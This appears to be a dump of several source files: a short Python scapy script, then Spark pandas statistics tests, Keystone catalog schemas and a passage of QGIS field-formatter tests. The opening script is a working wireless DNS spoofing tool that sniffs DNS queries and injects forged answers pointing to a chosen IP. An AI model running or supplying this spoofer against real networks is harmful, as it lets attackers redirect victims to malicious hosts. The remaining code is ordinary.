logger = logging.getLogger('main')
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
logger.setLevel(logging.DEBUG)

# Set the interface for scapy to use.  Must be a monitor-mode 802.11
# interface for the raw frame injection below to work.
conf.iface = 'mon0'

# Set the spoofed response: every DNS query sniffed will be answered with
# an A record pointing at this address (placeholder — fill in before use).
spoofed_ip = 'x.x.x.x'
def send_response(x):
    """Forge and inject a spoofed DNS answer for the sniffed query *x*.

    *x* is a scapy 802.11 packet containing a DNS question (the sniff
    filter in main() only passes UDP port-53 traffic).  The answer is
    built by copying the request, flipping direction/addresses/ports, and
    attaching an A record for `spoofed_ip`.
    """
    req_domain = x[DNS].qd.qname
    logger.info('Found request for ' + req_domain)

    # First, we delete the existing lengths and checksums..
    # We will let Scapy re-create them
    del(x[UDP].len)
    del(x[UDP].chksum)
    del(x[IP].len)
    del(x[IP].chksum)

    # Let's build our response from a copy of the original packet
    response = x.copy()

    # Let's work our way up the layers!
    # We need to start by changing our response to be "from-ds", or from the access point.
    # NOTE(review): the long literals (2L, 1L) make this file Python 2-only.
    response.FCfield = 2L
    # Switch the MAC addresses
    response.addr1, response.addr2 = x.addr2, x.addr1
    # Switch the IP addresses
    response.src, response.dst = x.dst, x.src
    # Switch the ports
    response.sport, response.dport = x.dport, x.sport
    # Set the DNS flags: qr=1 marks a response, ra=1 advertises recursion,
    # and ancount announces the single answer record attached below.
    response[DNS].qr = 1L
    response[DNS].ra = 1L
    response[DNS].ancount = 1
    # Let's add on the answer section
    response[DNS].an = DNSRR(
        rrname = req_domain,
        type = 'A',
        rclass = 'IN',
        ttl = 900,
        rdata = spoofed_ip
    )
    # Now, we inject the response!
    sendp(response)
    logger.info('Sent response: ' + req_domain + ' -> ' + spoofed_ip + '\n')
def main():
    """Sniff DNS queries on conf.iface and answer each with a spoofed A record."""
    logger.info('Starting to intercept [CTRL+C to stop]')
    # lfilter restricts callbacks to UDP packets destined for port 53
    # (DNS queries); each match is answered by send_response().
    sniff(prn=lambda x: send_response(x), lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)
if __name__ == "__main__":
    # Script entry point; requires scapy and a monitor-mode interface.
    main()
wangmiao1981/spark | python/pyspark/pandas/tests/test_stats.py | 6 | 18881 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
try:
from pandas._testing import makeMissingDataframe
except ImportError:
from pandas.util.testing import makeMissingDataframe
from pyspark import pandas as ps
from pyspark.pandas.config import option_context
from pyspark.testing.pandasutils import PandasOnSparkTestCase, SPARK_CONF_ARROW_ENABLED
from pyspark.testing.sqlutils import SQLTestUtils
class StatsTest(PandasOnSparkTestCase, SQLTestUtils):
    """Tests for statistical reductions (min/max/mean/std/...) on
    pandas-on-Spark frames and series, compared against native pandas."""

    def _test_stat_functions(self, pdf_or_pser, psdf_or_psser):
        """Run the common battery of reductions on a pandas object and its
        pandas-on-Spark counterpart and assert the results agree."""
        functions = ["max", "min", "mean", "sum", "count"]
        for funcname in functions:
            self.assert_eq(getattr(psdf_or_psser, funcname)(), getattr(pdf_or_pser, funcname)())

        # Floating-point reductions are compared approximately.
        functions = ["std", "var", "product", "sem"]
        for funcname in functions:
            self.assert_eq(
                getattr(psdf_or_psser, funcname)(),
                getattr(pdf_or_pser, funcname)(),
                check_exact=False,
            )

        # Same reductions again with population (ddof=0) semantics.
        functions = ["std", "var", "sem"]
        for funcname in functions:
            self.assert_eq(
                getattr(psdf_or_psser, funcname)(ddof=0),
                getattr(pdf_or_pser, funcname)(ddof=0),
                check_exact=False,
            )

        # NOTE: To test skew, kurt, and median, just make sure they run.
        # The numbers are different in spark and pandas.
        functions = ["skew", "kurt", "median"]
        for funcname in functions:
            getattr(psdf_or_psser, funcname)()

    def test_stat_functions(self):
        # Basic frame with a NaN-bearing column, plus empty selections.
        pdf = pd.DataFrame({"A": [1, 2, 3, 4], "B": [1, 2, 3, 4], "C": [1, np.nan, 3, np.nan]})
        psdf = ps.from_pandas(pdf)
        self._test_stat_functions(pdf.A, psdf.A)
        self._test_stat_functions(pdf, psdf)

        # empty
        self._test_stat_functions(pdf.A.loc[[]], psdf.A.loc[[]])
        self._test_stat_functions(pdf.loc[[]], psdf.loc[[]])

    def test_stat_functions_multiindex_column(self):
        # Same battery with two-level column labels.
        arrays = [np.array(["A", "A", "B", "B"]), np.array(["one", "two", "one", "two"])]
        pdf = pd.DataFrame(np.random.randn(3, 4), index=["A", "B", "C"], columns=arrays)
        psdf = ps.from_pandas(pdf)
        self._test_stat_functions(pdf.A, psdf.A)
        self._test_stat_functions(pdf, psdf)

    def test_stat_functions_with_no_numeric_columns(self):
        # All-string frame: reductions should still behave like pandas.
        pdf = pd.DataFrame(
            {
                "A": ["a", None, "c", "d", None, "f", "g"],
                "B": ["A", "B", "C", None, "E", "F", None],
            }
        )
        psdf = ps.from_pandas(pdf)

        self._test_stat_functions(pdf, psdf)

    def test_sum(self):
        # sum() over both axes, including min_count handling of NaNs.
        pdf = pd.DataFrame({"a": [1, 2, 3, np.nan], "b": [0.1, np.nan, 0.3, np.nan]})
        psdf = ps.from_pandas(pdf)

        self.assert_eq(psdf.sum(), pdf.sum())
        self.assert_eq(psdf.sum(axis=1), pdf.sum(axis=1))
        self.assert_eq(psdf.sum(min_count=3), pdf.sum(min_count=3))
        self.assert_eq(psdf.sum(axis=1, min_count=1), pdf.sum(axis=1, min_count=1))
        self.assert_eq(psdf.loc[[]].sum(), pdf.loc[[]].sum())
        self.assert_eq(psdf.loc[[]].sum(min_count=1), pdf.loc[[]].sum(min_count=1))

        self.assert_eq(psdf["a"].sum(), pdf["a"].sum())
        self.assert_eq(psdf["a"].sum(min_count=3), pdf["a"].sum(min_count=3))
        self.assert_eq(psdf["b"].sum(min_count=3), pdf["b"].sum(min_count=3))
        self.assert_eq(psdf["a"].loc[[]].sum(), pdf["a"].loc[[]].sum())
        self.assert_eq(psdf["a"].loc[[]].sum(min_count=1), pdf["a"].loc[[]].sum(min_count=1))

    def test_product(self):
        # product() with negatives, NaNs, zeros, and min_count handling.
        pdf = pd.DataFrame(
            {"a": [1, -2, -3, np.nan], "b": [0.1, np.nan, -0.3, np.nan], "c": [10, 20, 0, -10]}
        )
        psdf = ps.from_pandas(pdf)

        self.assert_eq(psdf.product(), pdf.product(), check_exact=False)
        self.assert_eq(psdf.product(axis=1), pdf.product(axis=1))
        self.assert_eq(psdf.product(min_count=3), pdf.product(min_count=3), check_exact=False)
        self.assert_eq(psdf.product(axis=1, min_count=1), pdf.product(axis=1, min_count=1))
        self.assert_eq(psdf.loc[[]].product(), pdf.loc[[]].product())
        self.assert_eq(psdf.loc[[]].product(min_count=1), pdf.loc[[]].product(min_count=1))

        self.assert_eq(psdf["a"].product(), pdf["a"].product(), check_exact=False)
        self.assert_eq(
            psdf["a"].product(min_count=3), pdf["a"].product(min_count=3), check_exact=False
        )
        self.assert_eq(psdf["b"].product(min_count=3), pdf["b"].product(min_count=3))
        self.assert_eq(psdf["c"].product(min_count=3), pdf["c"].product(min_count=3))
        self.assert_eq(psdf["a"].loc[[]].product(), pdf["a"].loc[[]].product())
        self.assert_eq(
            psdf["a"].loc[[]].product(min_count=1), pdf["a"].loc[[]].product(min_count=1)
        )

    def test_abs(self):
        # abs() on numeric and boolean columns; string columns must raise.
        pdf = pd.DataFrame(
            {
                "A": [1, -2, np.nan, -4, 5],
                "B": [1.0, -2, np.nan, -4, 5],
                "C": [-6.0, -7, -8, np.nan, 10],
                "D": ["a", "b", "c", "d", np.nan],
                "E": [True, np.nan, False, True, True],
            }
        )
        psdf = ps.from_pandas(pdf)
        self.assert_eq(psdf.A.abs(), pdf.A.abs())
        self.assert_eq(psdf.B.abs(), pdf.B.abs())
        self.assert_eq(psdf.E.abs(), pdf.E.abs())
        # pandas' bug?
        # self.assert_eq(psdf[["B", "C", "E"]].abs(), pdf[["B", "C", "E"]].abs())
        self.assert_eq(psdf[["B", "C"]].abs(), pdf[["B", "C"]].abs())
        self.assert_eq(psdf[["E"]].abs(), pdf[["E"]].abs())

        with self.assertRaisesRegex(
            TypeError, "bad operand type for abs\\(\\): object \\(string\\)"
        ):
            psdf.abs()
        with self.assertRaisesRegex(
            TypeError, "bad operand type for abs\\(\\): object \\(string\\)"
        ):
            psdf.D.abs()

    def test_axis_on_dataframe(self):
        # The number of each count is intentionally big
        # because when data is small, it executes a shortcut.
        # Less than 'compute.shortcut_limit' will execute a shortcut
        # by using collected pandas dataframe directly.
        # now we set the 'compute.shortcut_limit' as 1000 explicitly
        with option_context("compute.shortcut_limit", 1000):
            pdf = pd.DataFrame(
                {
                    "A": [1, -2, 3, -4, 5] * 300,
                    "B": [1.0, -2, 3, -4, 5] * 300,
                    "C": [-6.0, -7, -8, -9, 10] * 300,
                    "D": [True, False, True, False, False] * 300,
                },
                index=range(10, 15001, 10),
            )
            psdf = ps.from_pandas(pdf)
            # Row-wise (axis=1) reductions, with and without numeric_only.
            self.assert_eq(psdf.count(axis=1), pdf.count(axis=1))
            self.assert_eq(psdf.var(axis=1), pdf.var(axis=1))
            self.assert_eq(psdf.var(axis=1, ddof=0), pdf.var(axis=1, ddof=0))
            self.assert_eq(psdf.std(axis=1), pdf.std(axis=1))
            self.assert_eq(psdf.std(axis=1, ddof=0), pdf.std(axis=1, ddof=0))
            self.assert_eq(psdf.max(axis=1), pdf.max(axis=1))
            self.assert_eq(psdf.min(axis=1), pdf.min(axis=1))
            self.assert_eq(psdf.sum(axis=1), pdf.sum(axis=1))
            self.assert_eq(psdf.product(axis=1), pdf.product(axis=1))
            self.assert_eq(psdf.kurtosis(axis=1), pdf.kurtosis(axis=1))
            self.assert_eq(psdf.skew(axis=1), pdf.skew(axis=1))
            self.assert_eq(psdf.mean(axis=1), pdf.mean(axis=1))
            self.assert_eq(psdf.sem(axis=1), pdf.sem(axis=1))
            self.assert_eq(psdf.sem(axis=1, ddof=0), pdf.sem(axis=1, ddof=0))
            self.assert_eq(
                psdf.count(axis=1, numeric_only=True), pdf.count(axis=1, numeric_only=True)
            )
            self.assert_eq(psdf.var(axis=1, numeric_only=True), pdf.var(axis=1, numeric_only=True))
            self.assert_eq(
                psdf.var(axis=1, ddof=0, numeric_only=True),
                pdf.var(axis=1, ddof=0, numeric_only=True),
            )
            self.assert_eq(psdf.std(axis=1, numeric_only=True), pdf.std(axis=1, numeric_only=True))
            self.assert_eq(
                psdf.std(axis=1, ddof=0, numeric_only=True),
                pdf.std(axis=1, ddof=0, numeric_only=True),
            )
            self.assert_eq(
                psdf.max(axis=1, numeric_only=True),
                pdf.max(axis=1, numeric_only=True).astype(float),
            )
            self.assert_eq(
                psdf.min(axis=1, numeric_only=True),
                pdf.min(axis=1, numeric_only=True).astype(float),
            )
            self.assert_eq(
                psdf.sum(axis=1, numeric_only=True),
                pdf.sum(axis=1, numeric_only=True).astype(float),
            )
            self.assert_eq(
                psdf.product(axis=1, numeric_only=True),
                pdf.product(axis=1, numeric_only=True).astype(float),
            )
            self.assert_eq(
                psdf.kurtosis(axis=1, numeric_only=True), pdf.kurtosis(axis=1, numeric_only=True)
            )
            self.assert_eq(
                psdf.skew(axis=1, numeric_only=True), pdf.skew(axis=1, numeric_only=True)
            )
            self.assert_eq(
                psdf.mean(axis=1, numeric_only=True), pdf.mean(axis=1, numeric_only=True)
            )
            self.assert_eq(psdf.sem(axis=1, numeric_only=True), pdf.sem(axis=1, numeric_only=True))
            self.assert_eq(
                psdf.sem(axis=1, ddof=0, numeric_only=True),
                pdf.sem(axis=1, ddof=0, numeric_only=True),
            )

    def test_corr(self):
        # Disable arrow execution since corr() is using UDT internally which is not supported.
        with self.sql_conf({SPARK_CONF_ARROW_ENABLED: False}):
            # DataFrame
            # we do not handle NaNs for now
            pdf = makeMissingDataframe(0.3, 42).fillna(0)
            psdf = ps.from_pandas(pdf)

            self.assert_eq(psdf.corr(), pdf.corr(), check_exact=False)

            # Series
            pser_a = pdf.A
            pser_b = pdf.B
            psser_a = psdf.A
            psser_b = psdf.B

            self.assertAlmostEqual(psser_a.corr(psser_b), pser_a.corr(pser_b))
            self.assertRaises(TypeError, lambda: psser_a.corr(psdf))

            # multi-index columns
            columns = pd.MultiIndex.from_tuples([("X", "A"), ("X", "B"), ("Y", "C"), ("Z", "D")])
            pdf.columns = columns
            psdf.columns = columns

            self.assert_eq(psdf.corr(), pdf.corr(), check_exact=False)

            # Series
            pser_xa = pdf[("X", "A")]
            pser_xb = pdf[("X", "B")]
            psser_xa = psdf[("X", "A")]
            psser_xb = psdf[("X", "B")]

            self.assert_eq(psser_xa.corr(psser_xb), pser_xa.corr(pser_xb), almost=True)

    def test_cov_corr_meta(self):
        # corr() across a frame mixing int/float widths, bools and strings.
        # Disable arrow execution since corr() is using UDT internally which is not supported.
        with self.sql_conf({SPARK_CONF_ARROW_ENABLED: False}):
            pdf = pd.DataFrame(
                {
                    "a": np.array([1, 2, 3], dtype="i1"),
                    "b": np.array([1, 2, 3], dtype="i2"),
                    "c": np.array([1, 2, 3], dtype="i4"),
                    "d": np.array([1, 2, 3]),
                    "e": np.array([1.0, 2.0, 3.0], dtype="f4"),
                    "f": np.array([1.0, 2.0, 3.0]),
                    "g": np.array([True, False, True]),
                    "h": np.array(list("abc")),
                },
                index=pd.Index([1, 2, 3], name="myindex"),
            )
            psdf = ps.from_pandas(pdf)
            self.assert_eq(psdf.corr(), pdf.corr())

    def test_stats_on_boolean_dataframe(self):
        # Reductions over a purely boolean frame.
        pdf = pd.DataFrame({"A": [True, False, True], "B": [False, False, True]})
        psdf = ps.from_pandas(pdf)

        self.assert_eq(psdf.min(), pdf.min())
        self.assert_eq(psdf.max(), pdf.max())
        self.assert_eq(psdf.count(), pdf.count())

        self.assert_eq(psdf.sum(), pdf.sum())
        self.assert_eq(psdf.product(), pdf.product())
        self.assert_eq(psdf.mean(), pdf.mean())

        self.assert_eq(psdf.var(), pdf.var(), check_exact=False)
        self.assert_eq(psdf.var(ddof=0), pdf.var(ddof=0), check_exact=False)
        self.assert_eq(psdf.std(), pdf.std(), check_exact=False)
        self.assert_eq(psdf.std(ddof=0), pdf.std(ddof=0), check_exact=False)
        self.assert_eq(psdf.sem(), pdf.sem(), check_exact=False)
        self.assert_eq(psdf.sem(ddof=0), pdf.sem(ddof=0), check_exact=False)

    def test_stats_on_boolean_series(self):
        # Same reductions on a boolean Series.
        pser = pd.Series([True, False, True])
        psser = ps.from_pandas(pser)

        self.assert_eq(psser.min(), pser.min())
        self.assert_eq(psser.max(), pser.max())
        self.assert_eq(psser.count(), pser.count())

        self.assert_eq(psser.sum(), pser.sum())
        self.assert_eq(psser.product(), pser.product())
        self.assert_eq(psser.mean(), pser.mean())

        self.assert_eq(psser.var(), pser.var(), almost=True)
        self.assert_eq(psser.var(ddof=0), pser.var(ddof=0), almost=True)
        self.assert_eq(psser.std(), pser.std(), almost=True)
        self.assert_eq(psser.std(ddof=0), pser.std(ddof=0), almost=True)
        self.assert_eq(psser.sem(), pser.sem(), almost=True)
        self.assert_eq(psser.sem(ddof=0), pser.sem(ddof=0), almost=True)

    def test_stats_on_non_numeric_columns_should_be_discarded_if_numeric_only_is_true(self):
        # numeric_only=True must drop the string column from every reduction.
        pdf = pd.DataFrame({"i": [0, 1, 2], "b": [False, False, True], "s": ["x", "y", "z"]})
        psdf = ps.from_pandas(pdf)

        self.assert_eq(
            psdf[["i", "s"]].max(numeric_only=True), pdf[["i", "s"]].max(numeric_only=True)
        )
        self.assert_eq(
            psdf[["b", "s"]].max(numeric_only=True), pdf[["b", "s"]].max(numeric_only=True)
        )
        self.assert_eq(
            psdf[["i", "s"]].min(numeric_only=True), pdf[["i", "s"]].min(numeric_only=True)
        )
        self.assert_eq(
            psdf[["b", "s"]].min(numeric_only=True), pdf[["b", "s"]].min(numeric_only=True)
        )
        self.assert_eq(psdf.count(numeric_only=True), pdf.count(numeric_only=True))

        if LooseVersion(pd.__version__) >= LooseVersion("1.0.0"):
            self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True))
            self.assert_eq(psdf.product(numeric_only=True), pdf.product(numeric_only=True))
        else:
            # Older pandas returns float here; cast to match on-Spark ints.
            self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True).astype(int))
            self.assert_eq(
                psdf.product(numeric_only=True), pdf.product(numeric_only=True).astype(int)
            )

        self.assert_eq(psdf.mean(numeric_only=True), pdf.mean(numeric_only=True))

        self.assert_eq(psdf.var(numeric_only=True), pdf.var(numeric_only=True), check_exact=False)
        self.assert_eq(
            psdf.var(ddof=0, numeric_only=True),
            pdf.var(ddof=0, numeric_only=True),
            check_exact=False,
        )
        self.assert_eq(psdf.std(numeric_only=True), pdf.std(numeric_only=True), check_exact=False)
        self.assert_eq(
            psdf.std(ddof=0, numeric_only=True),
            pdf.std(ddof=0, numeric_only=True),
            check_exact=False,
        )
        self.assert_eq(psdf.sem(numeric_only=True), pdf.sem(numeric_only=True), check_exact=False)
        self.assert_eq(
            psdf.sem(ddof=0, numeric_only=True),
            pdf.sem(ddof=0, numeric_only=True),
            check_exact=False,
        )

        # Values differ between Spark and pandas; only check column counts.
        self.assert_eq(len(psdf.median(numeric_only=True)), len(pdf.median(numeric_only=True)))
        self.assert_eq(len(psdf.kurtosis(numeric_only=True)), len(pdf.kurtosis(numeric_only=True)))
        self.assert_eq(len(psdf.skew(numeric_only=True)), len(pdf.skew(numeric_only=True)))

        # Boolean was excluded because of a behavior change in NumPy
        # https://github.com/numpy/numpy/pull/16273#discussion_r641264085 which pandas inherits
        # but this behavior is inconsistent in pandas context.
        # Boolean column in quantile tests are excluded for now.
        # TODO(SPARK-35555): track and match the behavior of quantile to pandas'
        pdf = pd.DataFrame({"i": [0, 1, 2], "s": ["x", "y", "z"]})
        psdf = ps.from_pandas(pdf)
        self.assert_eq(
            len(psdf.quantile(q=0.5, numeric_only=True)),
            len(pdf.quantile(q=0.5, numeric_only=True)),
        )
        self.assert_eq(
            len(psdf.quantile(q=[0.25, 0.5, 0.75], numeric_only=True)),
            len(pdf.quantile(q=[0.25, 0.5, 0.75], numeric_only=True)),
        )

    def test_numeric_only_unsupported(self):
        # numeric_only=False over a frame containing strings must raise.
        pdf = pd.DataFrame({"i": [0, 1, 2], "b": [False, False, True], "s": ["x", "y", "z"]})
        psdf = ps.from_pandas(pdf)

        if LooseVersion(pd.__version__) >= LooseVersion("1.0.0"):
            self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True))
            self.assert_eq(
                psdf[["i", "b"]].sum(numeric_only=False), pdf[["i", "b"]].sum(numeric_only=False)
            )
        else:
            self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True).astype(int))
            self.assert_eq(
                psdf[["i", "b"]].sum(numeric_only=False),
                pdf[["i", "b"]].sum(numeric_only=False).astype(int),
            )

        with self.assertRaisesRegex(TypeError, "Could not convert object \\(string\\) to numeric"):
            psdf.sum(numeric_only=False)

        with self.assertRaisesRegex(TypeError, "Could not convert object \\(string\\) to numeric"):
            psdf.s.sum()
if __name__ == "__main__":
    import unittest
    from pyspark.pandas.tests.test_stats import *  # noqa: F401

    try:
        # Prefer JUnit-style XML reports when xmlrunner is installed (as in
        # Spark's CI); otherwise fall back to the default text runner.
        import xmlrunner  # type: ignore[import]

        testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
    except ImportError:
        testRunner = None
    unittest.main(testRunner=testRunner, verbosity=2)
| apache-2.0 |
takeshineshiro/keystone | keystone/catalog/schema.py | 14 | 2387 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystone.common.validation import parameter_types
# JSON Schema property fragments shared by the region create/update validators.
_region_properties = {
    'description': {
        'type': ['string', 'null'],
    },
    # NOTE(lbragstad): Regions use ID differently. The user can specify the ID
    # or it will be generated automatically.
    'id': {
        'type': 'string'
    },
    'parent_region_id': {
        'type': ['string', 'null']
    }
}

# Request-body schema for region creation.
region_create = {
    'type': 'object',
    'properties': _region_properties,
    'additionalProperties': True
    # NOTE(lbragstad): No parameters are required for creating regions.
}

# Request-body schema for region update; at least one property must be sent.
region_update = {
    'type': 'object',
    'properties': _region_properties,
    'minProperties': 1,
    'additionalProperties': True
}
# JSON Schema property fragments shared by the service create/update validators.
_service_properties = {
    'enabled': parameter_types.boolean,
    'name': parameter_types.name,
    'type': {
        'type': 'string',
        'minLength': 1,
        'maxLength': 255
    }
}

# Request-body schema for service creation; only 'type' is mandatory.
service_create = {
    'type': 'object',
    'properties': _service_properties,
    'required': ['type'],
    'additionalProperties': True,
}

# Request-body schema for service update; at least one property must be sent.
service_update = {
    'type': 'object',
    'properties': _service_properties,
    'minProperties': 1,
    'additionalProperties': True
}
# JSON Schema property fragments shared by the endpoint create/update validators.
_endpoint_properties = {
    'enabled': parameter_types.boolean,
    'interface': {
        'type': 'string',
        'enum': ['admin', 'internal', 'public']
    },
    'region_id': {
        'type': 'string'
    },
    'region': {
        'type': 'string'
    },
    'service_id': {
        'type': 'string'
    },
    'url': parameter_types.url
}

# Request-body schema for endpoint creation; interface, service and URL required.
endpoint_create = {
    'type': 'object',
    'properties': _endpoint_properties,
    'required': ['interface', 'service_id', 'url'],
    'additionalProperties': True
}

# Request-body schema for endpoint update; at least one property must be sent.
endpoint_update = {
    'type': 'object',
    'properties': _endpoint_properties,
    'minProperties': 1,
    'additionalProperties': True
}
| apache-2.0 |
nyalldawson/QGIS | tests/src/python/test_qgsfieldformatters.py | 16 | 30927 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for field formatters.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Matthias Kuhn'
__date__ = '05/12/2016'
__copyright__ = 'Copyright 2016, The QGIS Project'
import tempfile
import qgis # NOQA
from qgis.core import (QgsFeature, QgsProject, QgsRelation, QgsVectorLayer,
QgsValueMapFieldFormatter, QgsValueRelationFieldFormatter,
QgsRelationReferenceFieldFormatter, QgsRangeFieldFormatter,
QgsCheckBoxFieldFormatter, QgsFallbackFieldFormatter,
QgsSettings, QgsGeometry, QgsPointXY, QgsVectorFileWriter)
from qgis.PyQt.QtCore import QCoreApplication, QLocale, QVariant
from qgis.testing import start_app, unittest
from utilities import writeShape
# Initialise the QGIS application environment once for the whole test module.
start_app()
class TestQgsValueMapFieldFormatter(unittest.TestCase):
    """Tests for QgsValueMapFieldFormatter.representValue()."""

    # Sentinel string the value-map config uses to stand in for NULL.
    VALUEMAP_NULL_TEXT = "{2839923C-8B7D-419E-B84B-CA2FE9B80EC7}"

    def test_representValue(self):
        """Check mapped display text for pre-3.0 and post-3.0 config styles,
        NULL handling, and the parenthesised fallback when no map is set."""
        QgsSettings().setValue("qgis/nullValue", "NULL")
        layer = QgsVectorLayer("none?field=number1:integer&field=number2:double&field=text1:string&field=number3:integer&field=number4:double&field=text2:string",
                               "layer", "memory")
        self.assertTrue(layer.isValid())
        QgsProject.instance().addMapLayer(layer)
        f = QgsFeature()
        f.setAttributes([2, 2.5, 'NULL', None, None, None])
        layer.dataProvider().addFeatures([f])
        fieldFormatter = QgsValueMapFieldFormatter()

        # Tests with different value types occurring in the value map
        # old style config (pre 3.0)
        config = {'map': {'two': '2', 'twoandhalf': '2.5', 'NULL text': 'NULL',
                          'nothing': self.VALUEMAP_NULL_TEXT}}
        self.assertEqual(fieldFormatter.representValue(layer, 0, config, None, 2), 'two')
        self.assertEqual(fieldFormatter.representValue(layer, 1, config, None, 2.5), 'twoandhalf')
        self.assertEqual(fieldFormatter.representValue(layer, 2, config, None, 'NULL'), 'NULL text')
        # Tests with null values of different types, if value map contains null
        self.assertEqual(fieldFormatter.representValue(layer, 3, config, None, None), 'nothing')
        self.assertEqual(fieldFormatter.representValue(layer, 4, config, None, None), 'nothing')
        self.assertEqual(fieldFormatter.representValue(layer, 5, config, None, None), 'nothing')

        # new style config (post 3.0)
        config = {'map': [{'two': '2'},
                          {'twoandhalf': '2.5'},
                          {'NULL text': 'NULL'},
                          {'nothing': self.VALUEMAP_NULL_TEXT}]}
        self.assertEqual(fieldFormatter.representValue(layer, 0, config, None, 2), 'two')
        self.assertEqual(fieldFormatter.representValue(layer, 1, config, None, 2.5), 'twoandhalf')
        self.assertEqual(fieldFormatter.representValue(layer, 2, config, None, 'NULL'), 'NULL text')
        # Tests with null values of different types, if value map contains null
        self.assertEqual(fieldFormatter.representValue(layer, 3, config, None, None), 'nothing')
        self.assertEqual(fieldFormatter.representValue(layer, 4, config, None, None), 'nothing')
        self.assertEqual(fieldFormatter.representValue(layer, 5, config, None, None), 'nothing')

        # Tests with fallback display for different value types
        config = {}
        self.assertEqual(fieldFormatter.representValue(layer, 0, config, None, 2), '(2)')
        self.assertEqual(fieldFormatter.representValue(layer, 1, config, None, 2.5), '(2.50000)')
        self.assertEqual(fieldFormatter.representValue(layer, 2, config, None, 'NULL'), '(NULL)')
        # Tests with fallback display for null in different types of fields
        self.assertEqual(fieldFormatter.representValue(layer, 3, config, None, None), '(NULL)')
        self.assertEqual(fieldFormatter.representValue(layer, 4, config, None, None), '(NULL)')
        self.assertEqual(fieldFormatter.representValue(layer, 5, config, None, None), '(NULL)')

        QgsProject.instance().removeAllMapLayers()
class TestQgsValueRelationFieldFormatter(unittest.TestCase):
    """Tests for QgsValueRelationFieldFormatter and its static helpers."""

    def test_representValue(self):
        """Decode a foreign key via a value-relation config, including every
        broken-config variant (missing/invalid layer, key, or value)."""
        first_layer = QgsVectorLayer("none?field=foreign_key:integer",
                                     "first_layer", "memory")
        self.assertTrue(first_layer.isValid())
        second_layer = QgsVectorLayer("none?field=pkid:integer&field=decoded:string",
                                      "second_layer", "memory")
        self.assertTrue(second_layer.isValid())
        QgsProject.instance().addMapLayer(second_layer)
        f = QgsFeature()
        f.setAttributes([123])
        first_layer.dataProvider().addFeatures([f])
        f = QgsFeature()
        f.setAttributes([123, 'decoded_val'])
        second_layer.dataProvider().addFeatures([f])
        fieldFormatter = QgsValueRelationFieldFormatter()

        # Everything valid
        config = {'Layer': second_layer.id(), 'Key': 'pkid', 'Value': 'decoded'}
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), 'decoded_val')
        # Code not find match in foreign layer
        config = {'Layer': second_layer.id(), 'Key': 'pkid', 'Value': 'decoded'}
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
        # Missing Layer
        config = {'Key': 'pkid', 'Value': 'decoded'}
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
        # Invalid Layer
        config = {'Layer': 'invalid', 'Key': 'pkid', 'Value': 'decoded'}
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
        # Invalid Key
        config = {'Layer': second_layer.id(), 'Key': 'invalid', 'Value': 'decoded'}
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
        # Invalid Value
        config = {'Layer': second_layer.id(), 'Key': 'pkid', 'Value': 'invalid'}
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')

        QgsProject.instance().removeMapLayer(second_layer.id())

    def test_valueToStringList(self):
        """valueToStringList() should normalise Python lists and the various
        serialized array notations ({...} and [...]) to a list of strings."""
        def _test(a, b):
            self.assertEqual(QgsValueRelationFieldFormatter.valueToStringList(a), b)

        _test([1, 2, 3], ["1", "2", "3"])
        _test("{1,2,3}", ["1", "2", "3"])
        _test(['1', '2', '3'], ["1", "2", "3"])
        _test('not an array', [])
        _test('[1,2,3]', ["1", "2", "3"])
        _test('{1,2,3}', ["1", "2", "3"])
        _test('{"1","2","3"}', ["1", "2", "3"])
        _test('["1","2","3"]', ["1", "2", "3"])
        _test(r'["a string,comma","a string\"quote", "another string[]"]', ['a string,comma', 'a string"quote', 'another string[]'])

    def test_expressionRequiresFormScope(self):
        """Detection of current_value()/form variables in filter expressions
        and whether an expression is usable for a given feature."""
        res = list(QgsValueRelationFieldFormatter.expressionFormAttributes("current_value('ONE') AND current_value('TWO')"))
        res = sorted(res)
        self.assertEqual(res, ['ONE', 'TWO'])

        res = list(QgsValueRelationFieldFormatter.expressionFormVariables("@current_geometry"))
        self.assertEqual(res, ['current_geometry'])

        self.assertFalse(QgsValueRelationFieldFormatter.expressionRequiresFormScope(""))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresFormScope("current_value('TWO')"))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresFormScope("current_value ( 'TWO' )"))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresFormScope("@current_geometry"))

        # An empty/invalid feature cannot satisfy form-scope expressions.
        self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("", QgsFeature()))
        self.assertFalse(QgsValueRelationFieldFormatter.expressionIsUsable("@current_geometry", QgsFeature()))
